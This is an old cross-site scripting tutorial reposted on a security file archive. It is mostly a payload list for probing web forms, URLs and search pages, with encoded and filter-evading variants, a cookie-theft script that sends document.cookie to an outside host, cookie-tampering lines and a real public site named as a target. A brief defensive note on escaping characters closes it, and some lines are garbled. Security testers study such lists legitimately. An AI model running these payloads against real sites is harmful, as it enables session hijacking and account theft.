Examples Of Cross Site Scripting Tests

Examples Of Cross Site Scripting Tests: Posted Dec 31, 2008; Authored by Rohit Bansal; This paper provides a wide range of methods for testing possible cross site scripting vulnerabilities on web applications.; tags | paper, web, vulnerability, xss; SHA-256 | 1ded78efce95f29cc0b7bf13ce3311ab2cc4a86490c2c1243407817565e38825; Download | Favorite | View

Examples Of Cross Site Scripting Tests

---------------------------------------------------------------------------------------
[+] Understanding XSS with
Samples<http://www.darkc0de.com/tutorials/Understanding_XSS_with_Samples.txt>
[+] Author: Rohit Bansal

---------------------------------------------------------------------------------------
Cross Site Scripting exsistance is because of the lack of filtering engines
to user inputs at websites on forms.


[example 1] <a href="[http://<XSS-host]/xssfile?hackerz request">Free !</a>
[example 2] <iframe src="[http://<XSS-host]/xssfile?evil request">Free
!</iframe>
[example 3] <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="
http://www.Site.com/xss.js"></SCRIPT>




XSS Cookie theft Javascript

http://host/a.php?variable="><script>document.location='
http://www.mysite.com/cgi-bin/cookie.cgi?
'%20+document.cookie</script>




Moding Cookies

[example 1]
<script>javascript:void(document.cookie="username=Admin")</script>





How to Search for Vul Hosts

[example 1] [host]/<script>alert("XSS")</script>
[example 2] [host]/<script>alert('XSS')</script>/
[example 3] [host]/<script>alert('XSS')</script>.
[example 4] [host]/<script>alert('XSS')</script>
[example 5] [host]/\<script\>alert(\'XSS\')\<\/script\>
[example 6] [host]/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
[example 7] [host]/\<sCRIPT>alert("d")</sCRIPT>\
[example 8] [host]/<\73CRIP\T>alert("dsf")<\/\73CRIP\T>
[example 9] [host]/<\73CRIP\T>alert('dsf')<\/\73CRIP\T>
[example 10] [host]/</sCRIP/T>alert("dsf")<///sCRIP/T>
[example 11] [host]/</sCRIP/T>alert('dsf')<///sCRIP/T>




[example 1] <script>javascript:alert(documentt.cookie)</script>
[example 2] <script>javascript:alert("XSS")</script>
[example 3] "<script>alert()</script>"This Site is not Secure!





- Also use "?" post request after the host.

[example 1] [host]/?<script>alert('XSS')</script>




WebServers XSS


Many webservers have default pages to folders that will look for a file.

[example 1]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas
[example 2]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp
[example 3]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp
[example 4]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm
[example 5]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html
[example 6]
[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext]




A common place for an XSS hole is inside a server default example files,
such as:

[example 1] [host]/cgi/example?test=<script>alert('xss')</script>




Most common places to find XSS in are the search files of servers.

[example 1] [host]/search.php?searchstring=<script>alert('XSS')</script>
[example 2] [host]/search.php?searchstring="><script>alert('XSS')</script>
[example 3] [host]/search.php?searchstring='><script>alert('XSS')</script>




Social Engineering XSS

Using the characters instead may fool the filters and allow XSS to work.

[example 1] [host]/%3cscript%3ealert('XSS')%3c/script%3e
[example 2] [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e
[example 3] [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e
[example 4] [host]/%3cscript%3ealert('XSS')%3c/script%3e
[example 5] [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e
[example 6] [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e
[example 7] [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e
[example 8] [host]/%3cscript%3ealert("XSS")%3c/script%3e
[example 9] [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e
[example 10] [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e
[example 11] [host]/%3cscript%3ealert("XSS")%3c/script%3e
[example 12] [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e
[example 13] [host]/%3cscript%3ealert(%34XSS%34)%3c%2fscript%3e
[example 14] [host]/%3cscript%3ealert(%34XSS%34)%3c/script%3e





- Also use "?" post request after the host.

[example 1] [host]/?%3cscript%3ealert('XSS')%3c/script%3e




100% encoded

[example 1] [host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d
%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e
%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
[example 3]
[host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%
6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e




Another form of encoding is: <script>alert(document.cookie)</script>

< is encoded as: <
> is encoded as: >


[example 1] %3Cscript%3Ealert(%22XSS%22)%3C/script%3E
[example 2] <script>alert("XSS")</script>
[example 3] <script>alert("XSS")</script>
[example 4] <script>alert(%34XSS%34)</script>
[example 5] <script>alert('XSS')</script>




[example 1]
www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E




Any of the XSS requests presented above could be used on any asp, cfm,
jsp, cgi, php or any other active html file.

[example 1] [host]/forum/post.asp?<script>alert('XSS')</script>
[example 2] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e
[example 3] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e
[example 4] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e
[example 5] [host]/forum/post.asp?<script>alert("XSS")</script>




Finding errors such as inputting a string instead of a number or "\" or "/"
instead of a string,
or a very long string & a very large number. All this malformed parameters
can help us find
the place to inject XSS script.

Tag Closer

The "Tag Closer" method is used by inputing non-alphabetic and non-numeric
chars
inside form's input text boxes. This chars could be:
\,/,~,!,#,$,%,^,&,-,[,],null(char 255),.(dot)
But the chars that mostly does the job is either " or '. What we do is just
insert "> or '> inside
a text box instead of our name/email/username/password and etc...

[example 1]
[host]/admin/login.asp?username="><script>alert('XSS')</script>&password=1234

[example 2]
[host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script>

[example 3]
[host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~">

< /textarea>--><script>alert('XSS')</script>
[example 4]
[host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>




[example 1]
[host]/admin/login.asp?username='><script>alert('XSS')</script>&password=1234

[example 2]
[host]/admin/login.asp?username=admin&password='><script>alert('XSS')</script>

[example 3]
[host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'></textarea>-->

< script>alert('XSS')</script>
[example 4]
[host]/search.php?action=soundex&firstname='><script>alert(document.cookie)</script>




This mainly works on the servers root:

[example 1] [host]/?"><script>alert('XSS')</script>
[example 2] [host]/?'><script>alert('XSS')</script>
[example 3] [host]/?--><script>alert('XSS')</script>




About <plaintext>

Another trick for exploiting an XSS was found by putting a <plaintext> tag
after the xss code. Sometimes that makes it easie to exploit.

[example 1] [host]/?"><script>alert('XSS')</script><plaintext>
[example 2] [host]/?'><script>alert('XSS')</script><plaintext>
[example 3]
[host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234

[example 4]
[host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext>

[example 5] [host]/forum/post.asp?<script>alert('XSS')</script><plaintext>
[example 6]
[host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext>
[example 7]
[host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext>
[example 8]
[host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e<plaintext>
[example 9] [host]/forum/post.asp?<script>alert("XSS")</script><plaintext>
[example 10]
[host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script><plaintext>




[example 1]
www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cplaintext%3E[/code{]
 }

Simple Codes just incase some of them do-not seem to work:

[code]< /title><script>alert("XSS");</script><title><plaintext>
< script>alert(document.cookie)</script><plaintext>




Security Conclusion

[Replace]

< with <
> with >
& with &
" with &quote;

[Possible XSS]

<applet> <frameset> <layer> <body>
< html> <ilayer> <embed> <iframe>
< meta> <frame> <img> <object>
< script> <style>

---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap, Infysec
---------------------------------------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Examples Of Cross Site Scripting Tests

Examples Of Cross Site Scripting Tests

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Examples Of Cross Site Scripting Tests

Share This

Examples Of Cross Site Scripting Tests

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems